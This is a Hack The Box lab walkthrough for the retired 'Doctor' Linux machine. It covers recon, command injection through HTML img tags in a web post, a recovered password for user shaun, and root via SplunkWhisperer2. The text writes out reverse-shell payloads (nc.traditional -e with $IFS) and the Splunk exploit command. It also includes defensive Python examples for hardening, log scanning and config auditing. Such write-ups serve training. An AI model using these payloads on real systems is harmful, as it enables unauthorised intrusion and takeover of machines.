HTB Doctor Machine Walkthrough

February 10, 2021
Doctor is a recently retired Linux machine on Hack The Box. The IP address of the machine is 10.10.10.209. The stated difficulty is "easy", but the user rating of medium is, to be honest, the more appropriate one.
Here you need to capture two flags, the user flag and the root flag. When you submit both flags, you score 20 points.
Before beginning, check connectivity to the Doctor machine with ping 10.10.10.209. If you get a reply, you're good to go.

Scanning

Begin with an Nmap scan as usual. The scan reveals 3 open ports: SSH on port 22, Apache2 on port 80, and Splunkd on port 8089.
Let's start by exploring the web service on port 80. Navigate to http://10.10.10.209 in a browser. You will see a static website with basic pages.
There is no login page on this site. The email address info@doctors.htb is found while browsing the website. It contains the domain doctors.htb, so add that domain to the /etc/hosts file; if virtual hosting is in use, we'll get a different website.
After adding the domain, go to http://doctors.htb. You'll find a Login tab. After trying a few guesses at the login form without success, click Register to create an account. Using a private (incognito) window in Firefox is recommended to avoid problems.
You will get a message on the screen that your account has a time limit of 20 minutes.
To test the application, create a post with a title and content containing an HTML tag that points at your own IP address, and run a Python web server locally to catch the connection. It becomes clear that the application fetches the URL, that is, it communicates with your local machine.
In other words, we injected data through the application and received the resulting request on our local system.
Again, to test this, start a netcat listener on port 80 on the Kali machine. Create a post with a title and, in the content, add <img src=http://your-IP-address/$(id)>. Here we try to get the output of id. Since id is a system command, it is wrapped in the $( ) command-substitution syntax. Click the Post button. If everything is okay, you should get the output of id in the incoming request.

Checking for RCE

To test for RCE, start the Python web server on your local machine and look carefully at the REQUESTS made to it. Inject <img src=http://your-IP-address/$(id)> in the Content box; after you have posted it, you will get a REQUEST on your web server whose path includes the output of id, the uid of the user running the command, here web. From this, we can confirm remote code execution on the Doctor machine.

Getting Reverse Shell

You can use nc.traditional to get the reverse shell. Start a netcat listener on port 4444 and add <img src=http://your-ip-address/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'your-ip-address'$IFS'4444')> to the Content section.
The $IFS variable is the shell's Internal Field Separator, whose default value is space (followed by tab and newline), so it stands in for the spaces the payload cannot contain.
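The bug behind the "Checking for RCE" section and the $IFS note above, seen from the defender's side: the URL taken from a post is handed to a shell, so $( ) and $IFS are expanded before the fetch. This is an added example, not code from the original post or from the Doctor application; the command construction, function names and URLs are assumptions. It puts the vulnerable shape beside a hardened version that validates the URL and passes it as one argv element with no shell involved.

```python
import re
import subprocess
from typing import List, Optional
from urllib.parse import urlparse

# Constructed URLs in the shape the walkthrough posts (not executed here).
# The second one carries no literal space: $IFS does the separating.
CMD_SUBST_URL = "http://your-ip-address/$(id)"
IFS_URL = "http://your-ip-address/$(id$IFS-u)"


def build_command_vulnerable(url: str) -> str:
    """Assumed shape of the bug: the user-supplied URL is pasted into one
    shell string and later run with shell=True, so sh performs $(...) and
    $IFS expansion before curl ever sees the URL."""
    return f"curl -s {url}"


# Anything that lets sh see more than one word or start a substitution.
SHELL_META = re.compile(r"[\s$`;|&<>(){}\\'\"]")


def is_safe_url(url: str) -> bool:
    """Allow-list: http(s) scheme, a hostname, no shell metacharacters.
    Rejecting '$' is what defeats the $IFS trick; a whitespace-only check
    would wave IFS_URL through because it contains no space at all."""
    if SHELL_META.search(url):
        return False
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.hostname)


def build_command_hardened(url: str) -> Optional[List[str]]:
    """Return an argv list, or None when the URL is rejected. With a list
    and shell=False there is no shell to interpret $(...) at all, so the
    URL reaches curl as a single literal argument."""
    if not is_safe_url(url):
        return None
    return ["curl", "-s", "--max-time", "5", url]


def fetch_url(url: str) -> Optional[bytes]:
    """Hardened fetch; not exercised by the tests because it needs curl."""
    argv = build_command_hardened(url)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, timeout=10).stdout
```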
To check whether python3 is installed on the Doctor machine, run which python3. Then upgrade to a proper TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
After the above commands, we have a proper shell on the Doctor machine.
There are two users, web and shaun, in the home directory of Doctor. Try to switch to the user shaun, but that needs a password, and so far we have no credentials.
To find credentials, we use the linpeas.sh script. Serve it from your machine with python -m http.server 9090 and download it onto the Doctor machine.
linpeas.sh finds the password Guitar123 in a backup log of apache2. You can find this file in the directory /var/log/apache2/.
Try this credential on the user shaun, and the switch to shaun succeeds.
Congratulations! You have successfully acquired the user flag.
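The finding above, a password sitting in an Apache log, is something the server owner can check for routinely. As an added example that is not from the original post: a small Python scanner over constructed access-log lines that flags requests whose query string carries a credential-looking parameter and reports where it occurred without copying the secret into its own output. The page does not say how the password reached the log on this box; the sample lines, endpoints and values are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed lines in Apache combined-log format. The paths and the
# credential values are placeholders, not values from the Doctor machine.
SAMPLE_LOG = """\
10.10.14.5 - - [05/Sep/2020:11:17:34 +0200] "GET /account/update?email=a@doctors.htb&password=pl4ceholder-pw HTTP/1.1" 302 209 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:18:01 +0200] "GET /home HTTP/1.1" 200 5721 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:18:20 +0200] "POST /login HTTP/1.1" 302 209 "-" "Mozilla/5.0"
10.10.14.5 - - [05/Sep/2020:11:19:02 +0200] "GET /api/export?format=csv&api_key=k-constructed-1 HTTP/1.1" 200 88 "-" "curl/7.68.0"
"""

# Request line as Apache writes it: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter names that should never travel in a query string.
SECRET_KEYS = re.compile(r"^(pass(word|wd)?|pwd|secret|token|api_?key)$", re.I)

# line_no, method, path, parameter name, length of the value
Finding = Tuple[int, str, str, str, int]


def find_credentials_in_log(text: str) -> List[Finding]:
    """Flag requests whose query string carries a credential-looking parameter.
    Only the value's length is reported, so the scanner's output does not
    become a second copy of the secret. POST bodies never appear in the
    access log, which is why the POST /login line is not flagged."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if SECRET_KEYS.match(key):
                findings.append((line_no, m.group("method"), parts.path, key, len(value)))
    return findings


def scan_file(path: str) -> List[Finding]:
    """Run the scanner over a real log file, e.g. one under /var/log/apache2/."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_credentials_in_log(fh.read())
```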

Privilege Escalation

linpeas.sh also indicated a possible privilege escalation through Splunk. Some research on how to perform privilege escalation using Splunk turned up a suitable technique in the first link.
To escalate privileges, the SplunkWhisperer2 tool is used. Follow the steps below.
Start a netcat listener in one window:
nc -l 6666
Clone the repository from GitHub:
git clone https://github.com/cnotin/SplunkWhisperer2.git
Change directory to SplunkWhisperer2/PySplunkWhisperer2.
Run the following command:
python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost your-ip-address --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh your-ip-address 6666'
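What makes the Splunk route above work is configuration rather than a software flaw: the forwarder's management port on 8089 accepts a remote login, the password of the OS user shaun is also accepted by Splunk, and whatever the forwarder is told to run executes with splunkd's privileges, which here yields root. As an added example that is not from the original post or from Splunk: a Python audit of a Universal Forwarder's server.conf with a constructed weak fragment beside a hardened one. allowRemoteLogin is a documented server.conf setting; the two extra inputs are assumed to come from a host inventory.

```python
import configparser
from typing import List

# Constructed server.conf fragments for a Universal Forwarder. The weak one
# is the posture the escalation above relies on.
WEAK_SERVER_CONF = """\
[general]
serverName = doctor
allowRemoteLogin = always
"""

HARDENED_SERVER_CONF = """\
[general]
serverName = doctor
allowRemoteLogin = never
"""


def audit_forwarder(conf_text: str, splunkd_user: str,
                    password_shared_with_os: bool) -> List[str]:
    """Return findings (an empty list means nothing flagged).
    allowRemoteLogin takes always | never | requireSetPassword; only 'never'
    refuses logins to the REST API on the management port, so a missing key
    is not treated as safe. splunkd_user and password_shared_with_os are
    assumed to be gathered separately (e.g. from ps and a credential audit)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    findings: List[str] = []
    remote_login = cp.get("general", "allowRemoteLogin", fallback="(unset)").strip()
    if remote_login != "never":
        findings.append(f"allowRemoteLogin = {remote_login}: management port 8089 "
                        "accepts remote logins")
    if splunkd_user == "root":
        findings.append("splunkd runs as root: anything it is told to run runs as root")
    if password_shared_with_os:
        findings.append("Splunk admin password is also an OS account password")
    return findings
```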

Root Flag

Congratulations! You have successfully acquired the root flag as well.
I hope this walkthrough was helpful and that you learned something new from it.
